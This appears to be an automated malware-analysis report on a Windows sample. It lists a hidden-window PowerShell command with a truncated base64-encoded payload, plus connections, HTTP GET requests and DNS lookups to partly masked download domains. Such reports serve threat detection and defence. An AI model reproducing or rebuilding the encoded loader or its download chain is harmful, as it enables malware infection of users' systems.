Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAG4AZQB3AC0ATwBiAGoARQBDAHQAIAAgAHMAeQBTAFQAZQBtAC4AaQBvAC4AYwBPAE0AUAByAEUAUwBTAEkATwBOAC4AZABFAEYATABBAHQARQBzAFQAcgBlAEEAbQAoACAAWwBzAFkAUwBUAGUAbQAuAEkAbwAuAG0ARQBtAE8AcgB5AHMAdAByAG...
Network activity
Connects to
- 'we###ars.com':443
- 'le##s8.com':80
- 'tr##per.cn':80
- 'da##izm.com':80
TCP
HTTP GET requests
- http://www.le##s8.com/application/app/storage/fcUvyw/
- http://tr##per.cn/mYxYbKPAYL/
- http://www.da##izm.com/8NsZJvZYoy/
Other
- 'we###ars.com':443
UDP
- DNS ASK we###ars.com
- DNS ASK le##s8.com
- DNS ASK tr##per.cn
- DNS ASK da##izm.com
- DNS ASK mg###e.com.br
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAG4AZQB3AC0ATwBiAGoARQBDAHQAIAAgAHMAeQBTAFQAZQBtAC4AaQBvAC4AYwBPAE0AUAByAEUAUwBTAEkATwBOAC4AZABFAEYATABBAHQARQBzAFQAcgBlAEEAbQAoACAAWwBzAFkAUwBUAGUAbQAuAEkAbwAuAG0ARQBtAE8AcgB5AHMAdAByAG...' (with hidden window)
